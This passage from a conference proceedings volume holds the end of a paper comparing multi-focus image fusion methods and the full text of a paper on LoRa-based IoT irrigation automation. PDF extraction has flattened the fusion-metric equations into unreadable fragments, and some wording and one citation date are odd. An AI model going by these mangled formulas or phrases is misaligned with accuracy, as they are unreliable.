cients were combined to generate the integrated patches. At last, final creation of
fused output image was fulfilled via calculating the average of overlapped image
patches.

4 Evaluation Metrics

Also known as evaluation metrics are utilized to assess the effectiveness of the fusion
techniques. Here, some of fusion metrics have been illustrated as:

4.1 Normalized Mutual Information (NMI)

A normalized mutual information metric was devised in [71] and it was enhanced
version of traditional MI metric, and it is given by following equation:
 
MI(P, F) MI(Q, F)
NMI = 2 + (1)
E(P) + E(F) E(Q) + E(F)

where E(P) depicts entropy of image P while MI(P, Q) illustrates the mutual infor-
mation in between images P and Q. Here, P, Q has been taken as two input images,
and F is taken as fused output image.

4.2 Nonlinear Correlation Information Entropy (NCIE)

Proposed by [72]. It is a performance metric and relied on information theory and it


is represented as:


3
λa λa
NCIE = 1 + log256 (2)
a=1
3 3

where λa , a ∈ {1, 2, 3} represents eigen values out of the nonlinear correlation


matrix M.
Study and Performance Analysis … 253
⎡ ⎤
1 NCCPQ NCCPF
M = ⎣ NCCQP 1 NCCQF ⎦ (3)
NCCFP NCCFQ 1

where NCCPQ illustrates the nonlinear correlation coefficient in between images P


and Q [53].

4.3 Gradient-Based Metric GBM

This fusion metric is based on features of image and was proposed by [73]. With the
help of this metric, it is measured that how much extent of gradient information has
been transferred to fused output image out of the input images. Expression to denote
is as following:
H W
a=1 b=1 Q MF (i, j)w M
(i, j) + Q NF (i, j)w N (i, j)
GBM = H W
(4)
a=1 b=1 w M (i, j) + w N (i, j)

where the size of the image is H × W. Q MF (i, j) = Q MF g (i, j) and Q h (i, j)


MF

represents strength of edge as well as orientation-related information procured in the


final fused image (F), out of the input image M, consecutively. The Q NF (i, j) can be
illustrated in a similar way. For illustrating the importance of Q MF (i, j), Q NF (i, j),
weighting criteria includes Q M (i, j) as well as Q N (i, j).

4.4 Phase Congruency-Based Metric (PCB)

This metric was proposed by [74]. It is a kind of performance metric which is relied
on image features such as image phase congruency. Information about image edges
as well as corners is the important component of this PCB metric. This metric may be
expressed as the multiplication of three correlation coefficients and may be expressed
as:
i
PCB = Pp (PM ) j (Pm )k (5)

where phase congruency is denoted by p, M, m, as maximum and minimum moments,


consecutively. Pp , (PM ), (Pm ) represent highest correlation coefficients in between
fused output image and input images along with their maximum selected map, and
i, j, k are the exponential parameters utilized for adjustment of the importance of the
three components.
254 V. Singh and V. D. Kaushik

Fig. 2 12 pairs of test images [75]

5 Experimental Setup and Simulation of Work

5.1 Experimental Setup

Experimentation details involved Windows 10 OS, MATLAB software for simula-


tion of results, Intel i3 microprocessor and RAM: 2 GB where Lytro multi-focus
dataset [75] has 20 pairs of color multi-focus images and 4 series of multi-focus
images with a three image set in each. Figure 2 depicts 12 test image pairs taken
out of the Lytro multi-focus color image standard dataset available online publically,
where image size is 520 × 520 of each image.

5.2 Comparative Discussion

Illustrated as following:

5.3 Comparative Analysis

Figure 3(a–d) shows graphical analysis of the comparative methods for NCIE, NMI,
GBM, and PCB, respectively. It is obvious from Fig. 3a–d that for NCIE, NMI,
GBM, PCB fusion metrics, the method NSCT + SR has shown best performance
results while SR has shown second best performance results out of the listed methods
in Table 1.
Study and Performance Analysis … 255

Fig. 3 a Comparative analysis via NCIE metric. b Comparative analysis via NMI metric.
c Comparative analysis via GBM metric. d Comparative analysis via PCB metric

Table 1 Comparative analysis for “image 5” from the Lytro Multi-focus dataset [75]
S. Metrics DWT ICA DTCWT SR NSCT NSCT+SR
No.

1 NCIE 0.827 0.829 0.831 0.838 0.831 0.842

2 NMI 0.902 0.915 0.941 1.098 0.953 1.121

3 GBM 0.736 0.736 0.745 0.756 0.746 0.759

4 PCB 0.812 0.821 0.833 0.839 0.835 0.848

6 Conclusion and Future Scope

In this paper, authors have reviewed recent fusion-based techniques and tested
recent image fusion techniques, i.e., discrete wavelet transform (DWT), indepen-
dent component analysis (ICA), dual-tree complex wavelet transform (DTCWT),
sparse representation (SR), non-subsampled contourlet transform (NSCT), and
256 V. Singh and V. D. Kaushik

a hybrid of NSCT+SR, on Lytro multi-focus image dataset and comparatively


analyzed these methods on fusion metrics nonlinear correlation information entropy
(NCIE), normalized mutual information (NMI), gradient-based metric (GBM), phase
congruency-based metric (PCB). Analysis has demonstrated that NSCT+SR has
given best performance results (shown in dark blue color font) with a NCIE of 0.842,
NMI of 1.121, GBM of 0.759, and PCB of 0.848, while method SR has given second
best performance result (shown in red color font). Authors have also elucidated
regarding the essential requirements to consider while framing any fusion-based
scheme. In the future, we can test as well as analyze further more hybrid approaches
to compare the performance results for multi-focus image fusion techniques.

References

1. Xiao, B., Ou, G., Tang, H., Bi, X., & Li, W. (2020). Multi-focus image fusion by hessian
matrix-based decomposition. IEEE Transactions Multimedia, 22, 285–297.
2. Wan, T., Zhu, C., & Qin, Z. (2013). Multifocus image fusion based on robust principal
component analysis. Pattern Recognition Letter, 34, 1001–1008.
3. Guo, X., Nie, R., Cao, J., Zhou, D., Mei, L., & He, K. (2019). Fuse GAN: Learning to fuse multi-
focus image via conditional generative adversarial network. IEEE Transaction Multimedia, 21,
1982–1996.
4. Zhang, Q., & Guo, B.-L. (2009). Multifocus image fusion using the nonsubsampled contourlet
transform. IEEE Transactions on Signal Processing, 89, 1334–1346.
5. Kou, F., Wei, Z., Chen, W., Wu, X., Wen, C., & Li, Z. (2018). Intelligent detail enhancement
for exposure fusion. IEEE Transaction Multimedia, 20, 484–495.
6. Laganà, M. M., Preti, M. G., Forzoni, L., D’Onofrio, S., De Beni, S., Barberio, A., Pietro, C., &
Baselli, G. (2013). Transcranial ultrasound and magnetic resonance image fusion with virtual
navigator. IEEE Transaction Multimedia, 15, 1039–1048.
7. Wang, T., Chiu, C., Wu, W., Wang, J., Lin, C., Chiu, C., & Liou, J. (2015). Pseudo-multiple-
exposure-based tone fusion with local region adjustment. IEEE Transaction Multimedia, 17,
470–484.
8. Amin-Naji, M., & Aghagolzadeh, A. (2018). Multi-focus image fusion in DCT domain using
variance and energy of laplacian and correlation coefficient for visual sensor networks. Journal
of AI Data Mining, 6, 233–250.
9. Dou, W. (2018). Image degradation for quality assessment of pan-sharpening methods. Remote
Sensing, 10, 154.
10. Li, H., Jing, L., Tang, Y., & Wang, L. (2018). An image fusion method based on image
segmentation for high-resolution remotely-sensed imagery. Remote Sensing, 10, 790.
11. Li, Q., Yang, X., Wu, W., Liu, K., & Jeon, G. (2018). Multi-focus image fusion method for
vision sensor systems via dictionary learning with guided filter. Sensors, 18, 2143.
12. Cao, T., Dinh, A., Wahid, K. A., Panjvani, K., & Vail, S. (1887). Multi-focus fusion technique
on low-cost camera images for canola phenotyping. Sensors, 2018, 18.
13. Ganasala, P., & Kumar, V. (2014). Multimodality medical image fusion based on new features
in NSST domain. Biomedical Engineering Letters, 4, 414–424.
14. Du, J., Li, W., & Tan, H. (2019). Intrinsic image decomposition-based grey and pseudo-color
medical image fusion. IEEE Access, 7, 56443–56456.
15. Hu, H., Wu, J., Li, B., Guo, Q., & Zheng, J. (2017). An adaptive fusion algorithm for visible
and infrared videos based on entropy and the cumulative distribution of gray levels. IEEE
Transaction Multimedia, 19, 2706–2719.
Study and Performance Analysis … 257

16. Borsoi, R. A., Imbiriba, T., & Bermudez, J. C. M. (2020). Super-resolution for hyperspectral
and multispectral image fusion accounting for seasonal spectral variability. IEEE Transactions
on Image Processing, 29, 116–127.
17. Shao, Z., & Cai, J. (2018). Remote sensing image fusion with deep convolutional neural
network. SIEEE Journal of Selected Topics Application Earth Observation Remote Sensing,
11, 1656–1669.
18. Yang, B., & Li, S. (2010). Multifocus image fusion and restoration with sparse representation.
IEEE Transactions on Instrumentation and Measurement, 59, 884–892.
19. Merianos, I., & Mitianoudis, N. (2019). Multiple-exposure image fusion for HDR image
synthesis using learned analysis transformations. Journal of Imaging, 5, 32.
20. Liu, Y., Chen, X., Ward, R. K., & Wang, Z. J. (2016). Image fusion with convolutional sparse
representation. IEEE Transactions on Signal Processing, 23, 1882–1886.
21. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8, 131–142.
22. Kumar, B. K. S. (2013). Multifocus and multispectral image fusion based on pixel significance
using discrete cosine harmonic wavelet transform. Signal Image Video Process., 7, 1125–1143.
23. Rahman, M. A., Lin, S. C. F., Wong, C. Y., Jiang, G., Liu, S., & Kwok, N. (2016). Efficient
colour image compression using fusion approach. Imaging Science Journal, 64, 166–177.
24. Naidu, V. P. S., & Raol, J. R. (2008). Pixel-level image fusion using wavelets and principal
component analysis. Defence Science Journal, 58, 338–352.
25. Burt, P., & Adelson, E. (1983). The laplacian pyramid as a compact image code. IEEE
Transactions on Communications, 31, 532–540.
26. Adelson, E. H., Anderson, C. H., Bergen, J. R., Burt, P. J., & Ogden, J. M. (1984). Pyramid
methods in image processing. RCA Engineering, 29, 33–41.
27. Zhao, W., Lu, H., & Wang, D. (2018). Multisensor image fusion and enhancement in spectral
total variation domain. IEEE Transaction Multimedia, 20, 866–879.
28. Rockinger, O. (1997). Image sequence fusion using a shift-invariant wavelet transform. In
Proceedings of the International Conference on Image Processing (Vol. 3, pp. 288–291). Santa
Barbara.
29. Li, H., Manjunath, B., & Mitra, S. (1995). Multisensor image fusion using the wavelet
transform. Graphical Models Image Processing, 57, 235–245.
30. Tian, P., & Ni, G. (2009). Contrast-based image fusion using the discrete wavelet transform.
Optical Engineering, 39, 2075–2082.
31. Wang, W. W., Shui, P. L., & Feng, X. C. (2008). Variational models for fusion and denoising
of multifocus images. IEEE Transactions on Signal Processing, 15, 65–68.
32. Wan, T., Canagarajah, N., & Achim, A. (2009). Segmentation-driven image fusion based on
alpha-stable modeling of wavelet coefficients. IEEE Transactions Multimedia, 11, 624–633.
33. Liu, Y., Liu, S., & Wang, Z. (2015). Multi-focus image fusion with dense SIFT. Information
Fusion, 23, 139–155.
34. Nejati, M., Samavi, S., & Shirani, S. (2015). Multi-focus image fusion using dictionary-based
sparse representation. Information Fusion, 25, 72–84.
35. Liu, Z., Chai, Y., Yin, H., Zhou, J., & Zhu, Z. (2017). A novel multi-focus image fusion approach
based on image decomposition. Information Fusion, 35, 102–116.
36. Cao, L., Jin, L., Tao, H., Li, G., Zhuang, Z., & Zhang, Y. (2015). Multi-focus image fusion
based on spatial frequency in discrete cosine transform domain. IEEE Transactions on Signal
Processing, 22, 220–224.
37. He, K., Sun, J., & Tang, X. (2013). Guided image filtering. IEEE Transactions on Pattern
Analysis and Machine Intelligence, 35, 1397–1409.
38. Wright, J., Ma, Y., Mairal, J., Sapiro, G., Huang, T. S., & Yan, S. (2010). Sparse representation
for computer vision and pattern recognition. Proceedings of the IEEE, 98, 1031–1044.
39. Tropp, J. A. (2004). Greed is good: Algorithmic results for sparse approximation. IEEE
Transactions on Information Theory, 50, 2231–2242.
40. Qiu, X., Li, M., Zhang, L., & Yuan, X. (2019). Guided filter-based multi-focus image fusion
through focus region detection. Signal Processing Image Communication, 72, 35–46.
258 V. Singh and V. D. Kaushik

41. Li, S., Kang, X., & Hu, J. (2013). Image fusion with guided filtering. IEEE Transactions on
Image Processing, 22, 2864–2875.
42. Li, S., Kang, X., Hu, J., & Yang, B. (2013). Image matting for fusion of multi-focus images in
dynamic scenes. Information Fusion, 14, 147–162.
43. Wang, J., & Cohen, M. F. (2007). Image and video matting: A survey; foundations and trends
in computer graphics and vision (Vol. 3, pp. 97–175). Now Publishers Inc., Delft.
44. Shreyamsha Kumar, B. K. (2015). Image fusion based on pixel significance using cross bilateral
filter. Signal Image Video Processing, 9, 1193–1204.
45. Bai, X., Zhang, Y., Zhou, F., & Xue, B. (2015). Quadtree-based multi-focus image fusion using
a weighted focus-measure. Information Fusion, 22, 105–118.
46. Guo, D., Yan, J., & Qu, X. (2015). High quality multi-focus image fusion using self-similarity
and depth information. Optics Communication, 338, 138–144.
47. Qu, X., Hu, C., Yan, J. (2008) Image fusion algorithm based on orientation information moti-
vated pulse coupled neural networks. In Proceedings of the 7th World Congress on Intelligent
Control and Automation (pp. 2437–2441)
48. Qu, X.-B., Yan, J.-W., Xiao, H.-Z., & Zhu, Z.-Q. (2008). Image fusion algorithm based on spatial
frequency-motivated pulse coupled neural networks in nonsubsampled contourlet transform
domain. Acta Automation Sinica, 34, 1508–1514.
49. Zhang, Y., Bai, X., & Wang, T. (2017). Boundary finding based multi-focus image fusion
through multi-scale morphological focus-measure. Information Fusion, 35, 81–101.
50. Zhou, Z., Li, S., & Wang, B. (2014). Multi-scale weighted gradient-based fusion for multi-focus
images. Information Fusion, 20, 60–72.
51. Paul, S., Sevcenco, I. S., & Agathoklis, P. (2016). Multi-exposure and multi-focus image fusion
in gradient domain. Journal Circuits System Computer, 25, 1650123.
52. Farid, M. S., Mahmood, A., & Al-Maadeed, S. A. (2019). Multi-focus image fusion using
content adaptive blurring. Information Fusion, 45, 96–112.
53. Tao, Q., & Veldhuis, R. (2009). Threshold-optimized decision-level fusion and its application
to biometrics. Pattern Recognition, 42, 823–836.
54. Durrant-Whyte, H., & Henderson, T. C. (2008). Multisensor data fusion. Springer handbook
of robotics (pp. 585–610). Springer.
55. Varshney, P.K. (2000). Multisensor data fusion. Intelligent problem solving. In R. Palm, G. Ali
M. (Eds.). Methodologies and approaches; Logananthara (pp. 1–3). Springer.
56. Abhyankar, M., Khaparde, A., & Deshmukh, V. (2016). Spatial domain decision based image
fusion using superimposition. In Proceedings of the 2016 IEEE/ACIS 15th International
Conference on Computer and Information Science (ICIS) (pp. 1–6).
57. Liu, Y., & Wang, Z. (2015). Dense SIFT for ghost-free multi-exposure fusion. Journal of Visual
Communication and Image Representation, 31, 208–224.
58. Naidu, V., & Elias, B. (2013). A novel image fusion technique using DCT based Laplacian
Pyramid. International Journal of Invention Engineering Science (IJIES), 1, 1–9.
59. Tian, J., & Chen, L. (2012). Adaptive multi-focus image fusion using a wavelet-based statistical
sharpness measure. IEEE Transactions on Signal Processing, 92, 2137–2146.
60. Nunez, J. (1999). Multiresolution-based image fusion with additive wavelet decomposition.
IEEE Transactions on Geoscience and Remote Sensing, 37, 1204–1211.
61. Li, S., Kwok, J., & Wang, Y. (2001). Combination of images with diverse focuses using the
spatial frequency. Information Fusion, 2, 169–176.
62. Tian, J., Chen, L. (2010). Multi-focus image fusion using wavelet-domain statistics. In
Proceedings of the 2010 IEEE International Conference on Image Processing (pp. 1205–1208).
63. Liu, Y., Liu, S., & Wang, Z. (2015). A general framework for image fusion based on multi-scale
transform and sparse representation. Information Fusion, 24, 147–164.
64. Li, S., & Yang, B. (2008). Multifocus image fusion using region segmentation and spatial
frequency. Image and Vision Computing, 26, 971–979.
65. Li, S., Yang, B., & Hu, J. (2011). Performance comparison of different multi-resolution
transforms for image fusion. Information Fusion, 12, 74–84.
Study and Performance Analysis … 259

66. Li, S., & Yang, B. (2008). Multifocus image fusion by combining curvelet and wavelet
transform. Pattern Recognition Letter, 29, 1295–1301.
67. Haghighat, M. B. A., Aghagolzadeh, A., & Seyedarabi, H. (2011). Multi-focus image fusion for
visual sensor networks in DCT domain. Computers and Electrical Engineering, 37, 789–797.
68. Martorell, O., Sbert, C., & Buades, A. (2019). Ghosting-free DCT based multi-exposure image
fusion. Signal Processing Image Communication, 78, 409–425.
69. Kingsbury, N. (2000) The dual-tree complex wavelet transform with improved orthogo-
nality and symmetry properties. In Proceedings of IEEE International Conference on Image
Processing (ICIP) (pp. 375–378).
70. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8(2), 131–142.
71. Hossny, M., Nahavandi, S., & Creighton, D. (2008). Comments on information measure for
performance of image fusion. Electronics Letters, 44(18), 1066–1067.
72. Wang, Q., Shen, Y., & Zhang, J. (2005). A nonlinear correlation measure for multivariable data
set. Physica D: Nonlinear Phenomena, 200(3–4), 287–295.
73. Xydeas, C. S., & Petrovic, V. S. (2000). Objective image fusion performance measure.
Electronics Letters, 36(4), 308–309.
74. Zhao, J., Laganiere, R., & Liu, Z. (2007). Performance assessment of combinative pixel-level
image fusion based on an absolute feature measurement. International Journal of Innovative
Computing, Information and Control, 6(3), 1433–1447.
75. Lytro Multi-focus Image Dataset taken from, https://www.researchgate.net/publication/291522
937_Lytro_Multi-focus_Image_Dataset. Accessed on September 2020.
IoT-Based Agricultural Automation
Using LoRaWAN

Jaisal Chauhan, K. Agathiyan, and Neha Arora

Abstract Automation is the strategic placement of sensors, and the system responds
to various sensor readings in various situations. The practice of automation continues
to be widely adopted and integrated in health care, assembly line factory and other
major industries. However, in agriculture, most of the work is manual and effort
intensive. The farmers also do not have access to recommendations to make changes
to their method of operation to make the farming process cost conservative and more
efficient. The proposed system consists of edge devices and a central node. The edge
devices have an interfaced temperature and humidity sensor (DHT11) and moisture
sensor. The data collected by these sensors in all the edge devices is transmitted to the
central node via a long-range (LoRa) gateway. The LoRa wireless communication
technology is selected as it communicates in the 433 MHz ISM band which is not
monetarily charged by network providers and thus reduces data costs apart from
providing long-range communication capability in remote rural areas without much
network connectivity. The module used is the Ai-Thinker RA-02 LoRa module. The
central node transmits this collected data to a cloud-based database. AWS has been
used for the purposes of the current work. The system provides task automation such
as drip irrigation, and stored data can be run through an analytics engine to provide
farmers with insights regarding their practices and recommendations which increase
productivity and reduce operational costs.

Keywords LoRa module · Sensors · IoT · Agriculture · Temperature · Humidity

J. Chauhan (B) · K. Agathiyan · N. Arora


ASET, Amity University, Noida, India
N. Arora
e-mail: narora2@amity.edu

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 261
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_21
262 J. Chauhan et al.

1 Introduction

Water is one of the important factors for the survival and development of human
beings. Thus, water plays an important role in the process of agriculture. It also
affects the rate of economic development of the nation.
Patel [1] the availability of water for the irrigation will be comparatively less in the
future, i.e., by the year 2025 which is given by the International Water Management
Institute (IWMI). So, in the future in order to conserve water for agriculture, new
technologies are required to be implemented on the field. Currently, Internet of Things
(IoT) is emerging in almost all sectors. It not only covers agriculture but also a vast
region of sectors like transport, communication, industries, health care and many
more [2–5]. These days, sensors can be placed at the desired location or even worn
around the body to collect the input data [6]. There are use cases where sensors are
in moving state to collect data at different locations due to vast range of features
provided by wireless sensor nodes [7].
Current automated systems do include wireless communication between
connected devices and their interfaced sensors. However, this communication, as
it used to happen within infrastructure (buildings, factories, etc.), has been executed
mostly via 3G/4G communication technology that provides fast connectivity within
a closed structural infrastructure. However, since the system for agricultural automa-
tion is to operate outside in field, there are certain custom requirements accompa-
nying its implementation, such as the capability to function in areas with low network
coverage, transmit data over large distances in the open farmland and reduce costs,
as the sheer size of the farmland necessitates use of many units and cost per unit
should be low to make the overall system monetarily feasible to be implemented and
used.
Table 1 illustrates a comparison between various wireless data communication
technologies. As it is evident from the table, LoRa provides tangible benefits across
the board in terms of its low power consumption (which translates to lower operating

Table 1 Comparison of mainstream wireless communication technologies


Wireless standard Power Transmission range (typical) Data rates
Bluetooth Medium 1–100 m 1–3 Mbps
Bluetooth LE Lower >100 m 125 kbps–2 Mbps
LoRaWAN Low 10 km 0.3–50 kbps
NB-IoT Low <35 km 20 kbps–Mbps
NFC Low <10 cm 106–424 kbps
Sigfox Low 3–50 km 100–600 kbps
6LoWPAN Low 100 m 0–250 kbps
802.11/Wi-Fi Medium 100 m to several km (with boosters) 10–100 + Mbps
802.15/Zisbee Low 10–100 m 20–250 kbps
Z-Wave Low 15–150 m 9.6–40 kbps
IoT-Based Agricultural Automation Using LoRaWAN 263

costs and bills associated with system runtime), comparatively low costs for system
setup and maintenance, longevity even when working via battery (due to its low
power consumption), highest possible operating range which extends up to several
kilometers theoretically. In actual practice, due to disturbances created by physical
obstructions such as trees, sheds and other similar infrastructure of an obstructive
nature, the range is tuned approximately to a kilometer. However, a similar impact is
observed in the range of other wireless technologies, and they undergo range reduc-
tion, ensuring that LoRa retains its position and provides for highest communicative
range for wireless communication. The other benefits in terms of no monetary charges
incurred for data transfer due to LoRa operating in ISM range and its independence
from connectivity requirements have been explored previously.
In the subsequent sections, the relevant aspects associated with the proposed
system design and implementation have been outlined. Section 2 consists of the liter-
ature review, and Sect. 3 presents the detailed design-related aspects of the proposed
system. The implementation and working of the system is described in Sects. 4 and
5 concludes the work with future work.

2 Literature Review

LoRa communication technology was developed by SemtechTM and works on


“spread spectrum” where frequency and time are two spread factors of data which
increase range as well as provide robustness to the system. The receiver’s sensi-
tivity ranges from −137 dBm at 868 MHz and—148dBm at 433 MHz. In long-
range communication, throughput and range of the module depend on 3 parameters:
CR-Code Rate, SF—Spreading Factor and BW—Bandwidth.
Danco Davcev, Kosta Mitreski and Nikola Koteli developed a system for long-
range data communication from the sensor nodes to the cloud services while
consuming less power using LoRaWAN technology. Their system of cloud services
was highly scalable and utilized data stream for analytics purposes and was
implemented in grape farms [8].
Jaiganesh, Gunaseelan and Ellappan applied a cloud construct application which
was implemented for agriculture. It used agro-cloud which upgraded agricultural
generation and accessibility of information was identified. The correspondence was
made simpler and speedier [9].
Chandra Sukanya Nandyala and Haeng-Kon Kim worked on Green IoT and devel-
oped Green IoT Agriculture and Healthcare Application (GAHA) using a sensor-
cloud integration model. It targeted a sustainable smart world, by reducing the energy
consumption of IoT [10]. Tse-Chuan Hsu et al designed a creative IoT agriculture
platform for cloud and fog computing, proposing a decentralized Internet of Things
data analysis model to reduce costs of network transmission. The experimental results
were verified for the same [11].
Mahammad Shareef Mekala and Viswanathan P enhanced the understanding
of the different technologies being used to build sustainable smart agriculture
264 J. Chauhan et al.

by surveying some typical applications of agriculture IoT sensor monitoring


network technologies using cloud computing [12]. Nikesh Gondchawar and R. S.
Kawitkar used smart GPS-based remote-controlled robots to perform tasks like
weeding, spraying, moisture sensing, bird and animal scaring, keeping vigilance
and modernized the current traditional methods of agriculture [13].
D. Vasisht et al. enabled seamless data collection from IoT nodes by using an
end-to-end IoT platform such as FarmBeats. Their system design also accounted for
weather-related power and Internet outages [14]. S. R. Prathibha, Anupama Hongal
and M. P. Jyothi used IoT and automation for smart agriculture and monitored temper-
ature and humidity in agricultural field using CC3200 single chip [15]. J Muang-
prathub et al. proposed a scheme to optimize crop watering by developing wireless
sensor networks, designing and developing the control system between node sensors
in the field, the data management via smartphone and web application.
After reviewing some of the research work, to the best of authors knowledge, it
was observed that existed work focused primarily on data acquisition and transfer,
leaving it to the farmers to independently react to the data, by switching on the motor
for irrigation, for example. However, the proposed work accounts for some degree
of automated decision-making, wherein automatic drip irrigation is carried out when
soil moisture drops below a certain minimum threshold.

3 Designing of the System

The main components of the proposed device are as follows:

3.1 LoRa by Semtech Inc

Semtech’s LoRa is considered for short-range devices, i.e., the SRD due to its elec-
tromagnetic transmission in the lower GHz band. For example, in India, for elec-
tromagnetic radio transmissions, 433MHz ISM band is utilized by Semtech’s LoRa.
Here, 2% duty cycle which is about 72s/hour in a normal scenario are constrained
to the transmitters. The total transmission time has a duty limit, however, just about
half. About 1% duty cycle is large enough to comply with the application needs and
devices to communicate.

3.2 AI-Thinker RA-02 Module

For the current work, the Ai-Thinker RA-02 LoRa module has been used as it is
suitable for long-distance communications. The biggest benefit of this module is its
capability of performing all the required functionalities, at a low cost. LoRa modules
IoT-Based Agricultural Automation Using LoRaWAN 265

can be very expensive, depending on the specific module selected and its capabilities.
Certain modules may range above INR 30,000 but it is impractical to utilize these
due to monetary constraints, especially when the farmland may require many edge
devices, each outfitted with a LoRa module. Moreover, our target base, the farmers,
will not opt into the system if the associated costs are prohibitively large. Thus, a
cost effective alternative was provided in the form of RA-02 LoRa module.
Moreover, the most important consideration in the specifications is the frequency
range. The module provides low-power, long-range communication capabilities in
the 410–525 MHz frequency range. As the ISM band in India is 433MHz, this is
important. Communicate is preferred within this range to utilize the benefit of ISM
band communication, which incurs no monetary cost.
The product specifications of the RA-02 LoRa module are provided in Table 2
and 3 depicts the reception sensitivity of the Ai-Thinker Ra-02 radio module. Two

Table 2 Product specifications of the RA-02 LoRa module


Product specifications
Module model Ra—02
Package SMD–16
Size 17*16*(3.2 ± 0.1) mm
Interface SPI
Programmable bit rate UP to 300 Kbps
Frequency range 410–525 MHz
Antenna IPEX
Max transmit power 18 ± 1 dBm
Power (typical values) 433 MHz: TX: 93 mA RX: 12.15 mA Standby: 1 6 mA 470 MHz
TX:97 mA RX: 12.15 mA Standby: 1.5 mA
Power supply 2.5 ~ 3.7 V ‘Typical 3.3 V
Operating temperature −30 C ~ 85 C
Storage environment −40 C ~ 90 C, < 90%RH
Weight 0.45 g

Table 3 Reception
Receive sensitivity
sensitivity specifications of
RA-02 LoRa module with Frequency Spread factor SNR Sensitivity
different frequencies 433 MHz 7 −7 −125
10 −15 −134
12 −20 −141
470 MHz 7 −7 −126
10 −15 −135
12 −20 −141
266 J. Chauhan et al.

working frequencies, 433MHz and 470MHz, have been compared in terms of the
spread factor, signal to noise ratio (SNR) and sensitivity.

4 Implementation and Working

The LoRa gateway acts as the central hub in the network. Many edge devices of
the network with their interfaced sensors collect data and collectively transmit the
same using LoRaWAN to the gateway. The gateway collects data from multiple edge
devices. This data can be transferred to a cloud storage facility if Internet connectivity
exists or can be accessed directly via the gateway without Internet connection access.
LoRa networks can include thousands of connected edge devices with many gateways
to cover enormous area. However, considering the practical implementation of this
system in agriculture in South–East Asian countries, such extensive capabilities are
not required. The farm area in these countries is much smaller than the farms in
developed countries (Farms in the US can span many thousands of acres of land
while farms in India have an average land area of merely two acres per farmer).
Thus, in the proposed system, a single gateway connected to multiple edge devices
has been used. The LoRa gateway of the current work could be classified as “single
connection” as it is built around the SX1276/78 IC which acts as the LoRa module.
There are many SX1276/78 radio modules available, and the Ai-Thinker SX128
RA-02 LoRa is used for the current work.
Figure 1 describes the connections for the LoRa gateway by using components
which are easily available and can be procured either online or through hardware
and electronic vendors. This makes the gateway easy to assemble with seamless
part replacement and reduces the costs associated with component procurement,
replacement and assembly. The software stack is entirely an open source: (a) the
Raspberry runs an ordinary Raspbian conveyance, (b) the long-range correspondence
library depends on the SX1272 library and (c) the program for LoRa gateway is kept as
basic as could reasonably be expected. The gateway was tested in various conditions
with a DHT11 sensor to monitor the humidity and temperature levels. Tests show
that the low-cost gateway can be installed in outdoor conditions with the appropriate
waterproof casing.

Fig. 1 Connection diagram


for RPi and LoRa module
IoT-Based Agricultural Automation Using LoRaWAN 267

Gateway to Cloud (in the presence of internet connection) In the presence of


Internet connection, the gateway can transfer its collected sensor data to a cloud
storage facility. There are multiple options for online cloud-based data storage such
as Dynamo DB, Mongo DB and Firebase. Once uploaded, this data can be easily
accessed by the farmers by accessing the specific online account containing the stored
information, through provided user credentials. After the data transfer is done, data
analytics and other higher-order processing can be done. This is done beyond the
gateway stage and requires internet connectivity. Once connected, collected data can
be processed.
Gateway in the Absence of Internet Connectivity In the absence of Internet connec-
tivity, the received data cannot be stored in a cloud-based storage facility. However,
it is stored in the internal memory of the gateway and can still be accessed directly
through it provided a keyboard and monitor which is attached to it. It should be
noted that there is limited internal storage in the gateway (Raspberry Pi has 2GB
storage), and if the Internet connection is not available for prolonged durations,
stored information will build up, and this will adversely affect the gateway perfor-
mance efficiency and drain battery further. In extreme cases, it might even overload
the gateway storage capacity. If the information is being accessed directly from the
gateway, another alternative to using keyboards and monitors is to attach a Bluetooth
shield and transfer the data from the gateway to a local device via Bluetooth.

5 Results and Discussion

Figure 2 shows interfacing between the edge devices and the LoRa module. Two
Arduino boards are used, both acting as edge devices with interfaced sensors. The
edge devices each have an interfaced LoRa module and can engage in data transfer

Fig. 2 Two edge clients with


interfaced LoRa modules
268 J. Chauhan et al.

from one to another. Both the edge devices connect to a common RPi-based central
node which puts their transmitted data into a cloud database. For the current work
specifically, a Dynamo DB service offered by Amazon Web Services (AWS) has
been used. Since edge devices do not require much computational power and are
performing comparatively simple operation such as receiving interfaced sensor inputs
and transmitting it via LoRa module at periodic intervals, Arduino UNO boards were
chosen for edge devices considering its lower cost and appropriate computational
power.
Figure 3 depicts the raspberry pi with interfaced DHT11 sensor for sensor cali-
bration and testing. Once DHT11 was calibrated, it was able to detect the ambient
temperature, the readings of which are shown in Fig. 4. Similarly, the moisture sensor
was also interfaced, calibrated and tested before being integrated into the edge device
The readings given by the Raspberry Pi gateway after reception from edge devices,
which have been transferred to the Dynamo DB created on the AWS Cloud Account,
are depicted in Fig. 4a and b depicts the graphical representation of soil moisture
reading (which can be obtained from Dynamo DB) on AWS. The results indicate
that the system is robust and functions appropriately even if drastic changes in the
system environment take place. In case of the soil moisture graph, when the soil
was intentionally flooded with water, the concordant response was recorded in form
of graph at 11:06 am, one minute after the spike was intentionally induced. Then,
on removal of the sensor from that environment, the readings were reflective of the
change as early as the minute after an action was performed at 11:06 am. Thus, it is
expected that the system will function appropriately when deployed on large scale
in real fields and give data that is updated at high speed capable of reflecting any
changes that occur in the environment of the crops in real time. The proposed real-
time sensing capability and automated drip irrigation are expected to help the farmers
by reducing resource (water and electricity) wastage and optimizing operations by
using drip irrigation to conserve power as well as water.

Fig. 3 Two edge clients with


interfaced LoRa modules
IoT-Based Agricultural Automation Using LoRaWAN 269

Fig. 4 a Temperature readings transferred from gateway to Dynamo DB. b Soil moisture readings
graph

6 Conclusion

The research in current work presents several important issues that need to be
considered (a) long-range communication for rural access, (b) cost of equipment
and administration and (c) limit reliance to restrictive frameworks and give local
connection models. The proposed scheme addresses the above mentioned issues.
Directed for little to medium size deployment situations, the stage additionally bene-
fits brisk assignment and customization by outsiders. Processing of the device and
its connection with different cloud platforms has been presented in the paper. Exam-
ples include DropboxTM, FirebaseTM, ThingSpeakTM, freeboardTM, etc. Here,
the low-cost gateway runs on Dynamo DB and a web server to show the received
data in graphs. In result to that the designing of the low-cost LoRa gateway and end
devices is completed with some modification in the libraries as per the chipset used.
